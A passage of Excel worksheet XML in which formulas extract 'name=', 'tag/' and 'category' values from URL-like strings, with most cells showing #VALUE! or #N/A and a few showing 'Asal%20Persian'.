    ISNUMBER(FIND("category",$A3831)), MID($A3831, FIND("category",$A3831) + 9, LEN($A3831) - FIND("category",$A3831)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3831" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3832" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3832" t="s">
        <v>2728</v>
      </c>
      <c r="B3832" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3832" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3832" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3832" t="str" cm="1">
        <f t="array" ref="E3832">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3832)), MID($A3832, FIND("name=",$A3832) + 5, LEN($A3832) - FIND("name=",$A3832)),
    ISNUMBER(FIND("tag/",$A3832)), MID($A3832, FIND("tag/",$A3832) + 4, LEN($A3832) - FIND("tag/",$A3832)),
    ISNUMBER(FIND("category",$A3832)), MID($A3832, FIND("category",$A3832) + 9, LEN($A3832) - FIND("category",$A3832)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3832" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3833" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3833" t="s">
        <v>2728</v>
      </c>
      <c r="B3833" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3833" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3833" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3833" t="str" cm="1">
        <f t="array" ref="E3833">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3833)), MID($A3833, FIND("name=",$A3833) + 5, LEN($A3833) - FIND("name=",$A3833)),
    ISNUMBER(FIND("tag/",$A3833)), MID($A3833, FIND("tag/",$A3833) + 4, LEN($A3833) - FIND("tag/",$A3833)),
    ISNUMBER(FIND("category",$A3833)), MID($A3833, FIND("category",$A3833) + 9, LEN($A3833) - FIND("category",$A3833)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3833" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3834" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3834" t="s">
        <v>2728</v>
      </c>
      <c r="B3834" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3834" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3834" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3834" t="str" cm="1">
        <f t="array" ref="E3834">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3834)), MID($A3834, FIND("name=",$A3834) + 5, LEN($A3834) - FIND("name=",$A3834)),
    ISNUMBER(FIND("tag/",$A3834)), MID($A3834, FIND("tag/",$A3834) + 4, LEN($A3834) - FIND("tag/",$A3834)),
    ISNUMBER(FIND("category",$A3834)), MID($A3834, FIND("category",$A3834) + 9, LEN($A3834) - FIND("category",$A3834)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3834" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3835" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3835" t="s">
        <v>2728</v>
      </c>
      <c r="B3835" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3835" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3835" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3835" t="str" cm="1">
        <f t="array" ref="E3835">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3835)), MID($A3835, FIND("name=",$A3835) + 5, LEN($A3835) - FIND("name=",$A3835)),
    ISNUMBER(FIND("tag/",$A3835)), MID($A3835, FIND("tag/",$A3835) + 4, LEN($A3835) - FIND("tag/",$A3835)),
    ISNUMBER(FIND("category",$A3835)), MID($A3835, FIND("category",$A3835) + 9, LEN($A3835) - FIND("category",$A3835)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3835" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3836" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3836" t="s">
        <v>2728</v>
      </c>
      <c r="B3836" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3836" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3836" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3836" t="str" cm="1">
        <f t="array" ref="E3836">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3836)), MID($A3836, FIND("name=",$A3836) + 5, LEN($A3836) - FIND("name=",$A3836)),
    ISNUMBER(FIND("tag/",$A3836)), MID($A3836, FIND("tag/",$A3836) + 4, LEN($A3836) - FIND("tag/",$A3836)),
    ISNUMBER(FIND("category",$A3836)), MID($A3836, FIND("category",$A3836) + 9, LEN($A3836) - FIND("category",$A3836)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3836" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3837" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3837" t="s">
        <v>2248</v>
      </c>
      <c r="B3837" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3837" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3837" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3837" t="e" cm="1">
        <f t="array" ref="E3837">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3837)), MID($A3837, FIND("name=",$A3837) + 5, LEN($A3837) - FIND("name=",$A3837)),
    ISNUMBER(FIND("tag/",$A3837)), MID($A3837, FIND("tag/",$A3837) + 4, LEN($A3837) - FIND("tag/",$A3837)),
    ISNUMBER(FIND("category",$A3837)), MID($A3837, FIND("category",$A3837) + 9, LEN($A3837) - FIND("category",$A3837)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3837" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3838" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3838" t="s">
        <v>2728</v>
      </c>
      <c r="B3838" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3838" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3838" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3838" t="str" cm="1">
        <f t="array" ref="E3838">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3838)), MID($A3838, FIND("name=",$A3838) + 5, LEN($A3838) - FIND("name=",$A3838)),
    ISNUMBER(FIND("tag/",$A3838)), MID($A3838, FIND("tag/",$A3838) + 4, LEN($A3838) - FIND("tag/",$A3838)),
    ISNUMBER(FIND("category",$A3838)), MID($A3838, FIND("category",$A3838) + 9, LEN($A3838) - FIND("category",$A3838)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3838" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3839" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3839" t="s">
        <v>2601</v>
      </c>
      <c r="B3839" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3839" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3839" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3839" t="e" cm="1">
        <f t="array" ref="E3839">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3839)), MID($A3839, FIND("name=",$A3839) + 5, LEN($A3839) - FIND("name=",$A3839)),
    ISNUMBER(FIND("tag/",$A3839)), MID($A3839, FIND("tag/",$A3839) + 4, LEN($A3839) - FIND("tag/",$A3839)),
    ISNUMBER(FIND("category",$A3839)), MID($A3839, FIND("category",$A3839) + 9, LEN($A3839) - FIND("category",$A3839)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3839" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3840" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3840" t="s">
        <v>2368</v>
      </c>
      <c r="B3840" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3840" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3840" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3840" t="e" cm="1">
        <f t="array" ref="E3840">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3840)), MID($A3840, FIND("name=",$A3840) + 5, LEN($A3840) - FIND("name=",$A3840)),
    ISNUMBER(FIND("tag/",$A3840)), MID($A3840, FIND("tag/",$A3840) + 4, LEN($A3840) - FIND("tag/",$A3840)),
    ISNUMBER(FIND("category",$A3840)), MID($A3840, FIND("category",$A3840) + 9, LEN($A3840) - FIND("category",$A3840)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3840" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3841" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3841" t="s">
        <v>2478</v>
      </c>
      <c r="B3841" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3841" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3841" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3841" t="e" cm="1">
        <f t="array" ref="E3841">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3841)), MID($A3841, FIND("name=",$A3841) + 5, LEN($A3841) - FIND("name=",$A3841)),
    ISNUMBER(FIND("tag/",$A3841)), MID($A3841, FIND("tag/",$A3841) + 4, LEN($A3841) - FIND("tag/",$A3841)),
    ISNUMBER(FIND("category",$A3841)), MID($A3841, FIND("category",$A3841) + 9, LEN($A3841) - FIND("category",$A3841)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3841" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3842" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3842" t="s">
        <v>2248</v>
      </c>
      <c r="B3842" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3842" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3842" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3842" t="e" cm="1">
        <f t="array" ref="E3842">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3842)), MID($A3842, FIND("name=",$A3842) + 5, LEN($A3842) - FIND("name=",$A3842)),
    ISNUMBER(FIND("tag/",$A3842)), MID($A3842, FIND("tag/",$A3842) + 4, LEN($A3842) - FIND("tag/",$A3842)),
    ISNUMBER(FIND("category",$A3842)), MID($A3842, FIND("category",$A3842) + 9, LEN($A3842) - FIND("category",$A3842)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3842" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3843" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3843" t="s">
        <v>2728</v>
      </c>
      <c r="B3843" t="str">
        <f t="shared" si="178"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C3843" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3843" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3843" t="str" cm="1">
        <f t="array" ref="E3843">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3843)), MID($A3843, FIND("name=",$A3843) + 5, LEN($A3843) - FIND("name=",$A3843)),
    ISNUMBER(FIND("tag/",$A3843)), MID($A3843, FIND("tag/",$A3843) + 4, LEN($A3843) - FIND("tag/",$A3843)),
    ISNUMBER(FIND("category",$A3843)), MID($A3843, FIND("category",$A3843) + 9, LEN($A3843) - FIND("category",$A3843)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F3843" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="3844" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3844" t="s">
        <v>2591</v>
      </c>
      <c r="B3844" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3844" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3844" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3844" t="e" cm="1">
        <f t="array" ref="E3844">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3844)), MID($A3844, FIND("name=",$A3844) + 5, LEN($A3844) - FIND("name=",$A3844)),
    ISNUMBER(FIND("tag/",$A3844)), MID($A3844, FIND("tag/",$A3844) + 4, LEN($A3844) - FIND("tag/",$A3844)),
    ISNUMBER(FIND("category",$A3844)), MID($A3844, FIND("category",$A3844) + 9, LEN($A3844) - FIND("category",$A3844)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3844" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3845" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3845" t="s">
        <v>2575</v>
      </c>
      <c r="B3845" t="e">
        <f t="shared" si="178"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3845" t="e">
        <f t="shared" si="179"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3845" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3845" t="e" cm="1">
        <f t="array" ref="E3845">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3845)), MID($A3845, FIND("name=",$A3845) + 5, LEN($A3845) - FIND("name=",$A3845)),
    ISNUMBER(FIND("tag/",$A3845)), MID($A3845, FIND("tag/",$A3845) + 4, LEN($A3845) - FIND("tag/",$A3845)),
    ISNUMBER(FIND("category",$A3845)), MID($A3845, FIND("category",$A3845) + 9, LEN($A3845) - FIND("category",$A3845)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3845" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3846" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3846" t="s">
        <v>2377</v>
      </c>
      <c r="B3846" t="e">
        <f t="shared" ref="B3846:B3909" si="181">IF(FIND("name=",A3846,1)&gt;0,MID(A3846,FIND("name=",A3846,1)+5,LEN(A3846)-FIND("name=",A3846,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C3846" t="e">
        <f t="shared" ref="C3846:C3909" si="182">IF(FIND("tag/",$A3846,1)&gt;0,MID($A3846,FIND("tag/",$A3846,1)+4,LEN($A3846)-FIND("tag/",$A3846,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3846" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3846" t="e" cm="1">
        <f t="array" ref="E3846">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3846)), MID($A3846, FIND("name=",$A3846) + 5, LEN($A3846) - FIND("name=",$A3846)),
    ISNUMBER(FIND("tag/",$A3846)), MID($A3846, FIND("tag/",$A3846) + 4, LEN($A3846) - FIND("tag/",$A3846)),
    ISNUMBER(FIND("category",$A3846)), MID($A3846, FIND("category",$A3846) + 9, LEN($A3846) - FIND("category",$A3846)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3846" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3847" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3847" t="s">
        <v>2591</v>
      </c>
      <c r="B3847" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3847" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3847" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3847" t="e" cm="1">
        <f t="array" ref="E3847">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3847)), MID($A3847, FIND("name=",$A3847) + 5, LEN($A3847) - FIND("name=",$A3847)),
    ISNUMBER(FIND("tag/",$A3847)), MID($A3847, FIND("tag/",$A3847) + 4, LEN($A3847) - FIND("tag/",$A3847)),
    ISNUMBER(FIND("category",$A3847)), MID($A3847, FIND("category",$A3847) + 9, LEN($A3847) - FIND("category",$A3847)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3847" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3848" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3848" t="s">
        <v>2260</v>
      </c>
      <c r="B3848" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3848" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3848" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3848" t="e" cm="1">
        <f t="array" ref="E3848">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3848)), MID($A3848, FIND("name=",$A3848) + 5, LEN($A3848) - FIND("name=",$A3848)),
    ISNUMBER(FIND("tag/",$A3848)), MID($A3848, FIND("tag/",$A3848) + 4, LEN($A3848) - FIND("tag/",$A3848)),
    ISNUMBER(FIND("category",$A3848)), MID($A3848, FIND("category",$A3848) + 9, LEN($A3848) - FIND("category",$A3848)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3848" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3849" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3849" t="s">
        <v>2260</v>
      </c>
      <c r="B3849" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3849" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3849" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3849" t="e" cm="1">
        <f t="array" ref="E3849">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3849)), MID($A3849, FIND("name=",$A3849) + 5, LEN($A3849) - FIND("name=",$A3849)),
    ISNUMBER(FIND("tag/",$A3849)), MID($A3849, FIND("tag/",$A3849) + 4, LEN($A3849) - FIND("tag/",$A3849)),
    ISNUMBER(FIND("category",$A3849)), MID($A3849, FIND("category",$A3849) + 9, LEN($A3849) - FIND("category",$A3849)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3849" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3850" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3850" t="s">
        <v>2601</v>
      </c>
      <c r="B3850" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3850" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3850" t="e">
        <f t="shared" si="180"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3850" t="e" cm="1">
        <f t="array" ref="E3850">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3850)), MID($A3850, FIND("name=",$A3850) + 5, LEN($A3850) - FIND("name=",$A3850)),
    ISNUMBER(FIND("tag/",$A3850)), MID($A3850, FIND("tag/",$A3850) + 4, LEN($A3850) - FIND("tag/",$A3850)),
    ISNUMBER(FIND("category",$A3850)), MID($A3850, FIND("category",$A3850) + 9, LEN($A3850) - FIND("category",$A3850)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3850" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3851" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3851" t="s">
        <v>2818</v>
      </c>
      <c r="B3851" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3851" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3851" t="e">
        <f t="shared" ref="D3851:D3914" si="183">IF(FIND("category",$A3851,1)&gt;0,MID($A3851,FIND("category",$A3851,1)+9,LEN($A3851)-FIND("category",$A3851,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3851" t="e" cm="1">
        <f t="array" ref="E3851">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3851)), MID($A3851, FIND("name=",$A3851) + 5, LEN($A3851) - FIND("name=",$A3851)),
    ISNUMBER(FIND("tag/",$A3851)), MID($A3851, FIND("tag/",$A3851) + 4, LEN($A3851) - FIND("tag/",$A3851)),
    ISNUMBER(FIND("category",$A3851)), MID($A3851, FIND("category",$A3851) + 9, LEN($A3851) - FIND("category",$A3851)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3851" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3852" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3852" t="s">
        <v>2368</v>
      </c>
      <c r="B3852" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3852" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3852" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3852" t="e" cm="1">
        <f t="array" ref="E3852">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3852)), MID($A3852, FIND("name=",$A3852) + 5, LEN($A3852) - FIND("name=",$A3852)),
    ISNUMBER(FIND("tag/",$A3852)), MID($A3852, FIND("tag/",$A3852) + 4, LEN($A3852) - FIND("tag/",$A3852)),
    ISNUMBER(FIND("category",$A3852)), MID($A3852, FIND("category",$A3852) + 9, LEN($A3852) - FIND("category",$A3852)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3852" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3853" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3853" t="s">
        <v>2601</v>
      </c>
      <c r="B3853" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3853" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3853" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3853" t="e" cm="1">
        <f t="array" ref="E3853">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3853)), MID($A3853, FIND("name=",$A3853) + 5, LEN($A3853) - FIND("name=",$A3853)),
    ISNUMBER(FIND("tag/",$A3853)), MID($A3853, FIND("tag/",$A3853) + 4, LEN($A3853) - FIND("tag/",$A3853)),
    ISNUMBER(FIND("category",$A3853)), MID($A3853, FIND("category",$A3853) + 9, LEN($A3853) - FIND("category",$A3853)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3853" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3854" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3854" t="s">
        <v>2601</v>
      </c>
      <c r="B3854" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3854" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3854" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3854" t="e" cm="1">
        <f t="array" ref="E3854">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3854)), MID($A3854, FIND("name=",$A3854) + 5, LEN($A3854) - FIND("name=",$A3854)),
    ISNUMBER(FIND("tag/",$A3854)), MID($A3854, FIND("tag/",$A3854) + 4, LEN($A3854) - FIND("tag/",$A3854)),
    ISNUMBER(FIND("category",$A3854)), MID($A3854, FIND("category",$A3854) + 9, LEN($A3854) - FIND("category",$A3854)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3854" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3855" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3855" t="s">
        <v>2260</v>
      </c>
      <c r="B3855" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3855" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3855" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3855" t="e" cm="1">
        <f t="array" ref="E3855">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3855)), MID($A3855, FIND("name=",$A3855) + 5, LEN($A3855) - FIND("name=",$A3855)),
    ISNUMBER(FIND("tag/",$A3855)), MID($A3855, FIND("tag/",$A3855) + 4, LEN($A3855) - FIND("tag/",$A3855)),
    ISNUMBER(FIND("category",$A3855)), MID($A3855, FIND("category",$A3855) + 9, LEN($A3855) - FIND("category",$A3855)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3855" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3856" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3856" t="s">
        <v>2260</v>
      </c>
      <c r="B3856" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3856" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3856" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3856" t="e" cm="1">
        <f t="array" ref="E3856">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3856)), MID($A3856, FIND("name=",$A3856) + 5, LEN($A3856) - FIND("name=",$A3856)),
    ISNUMBER(FIND("tag/",$A3856)), MID($A3856, FIND("tag/",$A3856) + 4, LEN($A3856) - FIND("tag/",$A3856)),
    ISNUMBER(FIND("category",$A3856)), MID($A3856, FIND("category",$A3856) + 9, LEN($A3856) - FIND("category",$A3856)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3856" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3857" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3857" t="s">
        <v>2575</v>
      </c>
      <c r="B3857" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3857" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3857" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3857" t="e" cm="1">
        <f t="array" ref="E3857">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3857)), MID($A3857, FIND("name=",$A3857) + 5, LEN($A3857) - FIND("name=",$A3857)),
    ISNUMBER(FIND("tag/",$A3857)), MID($A3857, FIND("tag/",$A3857) + 4, LEN($A3857) - FIND("tag/",$A3857)),
    ISNUMBER(FIND("category",$A3857)), MID($A3857, FIND("category",$A3857) + 9, LEN($A3857) - FIND("category",$A3857)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3857" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3858" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3858" t="s">
        <v>2601</v>
      </c>
      <c r="B3858" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3858" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3858" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3858" t="e" cm="1">
        <f t="array" ref="E3858">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3858)), MID($A3858, FIND("name=",$A3858) + 5, LEN($A3858) - FIND("name=",$A3858)),
    ISNUMBER(FIND("tag/",$A3858)), MID($A3858, FIND("tag/",$A3858) + 4, LEN($A3858) - FIND("tag/",$A3858)),
    ISNUMBER(FIND("category",$A3858)), MID($A3858, FIND("category",$A3858) + 9, LEN($A3858) - FIND("category",$A3858)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3858" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3859" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3859" t="s">
        <v>2575</v>
      </c>
      <c r="B3859" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3859" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3859" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3859" t="e" cm="1">
        <f t="array" ref="E3859">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3859)), MID($A3859, FIND("name=",$A3859) + 5, LEN($A3859) - FIND("name=",$A3859)),
    ISNUMBER(FIND("tag/",$A3859)), MID($A3859, FIND("tag/",$A3859) + 4, LEN($A3859) - FIND("tag/",$A3859)),
    ISNUMBER(FIND("category",$A3859)), MID($A3859, FIND("category",$A3859) + 9, LEN($A3859) - FIND("category",$A3859)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3859" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3860" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3860" t="s">
        <v>2818</v>
      </c>
      <c r="B3860" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3860" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3860" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3860" t="e" cm="1">
        <f t="array" ref="E3860">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3860)), MID($A3860, FIND("name=",$A3860) + 5, LEN($A3860) - FIND("name=",$A3860)),
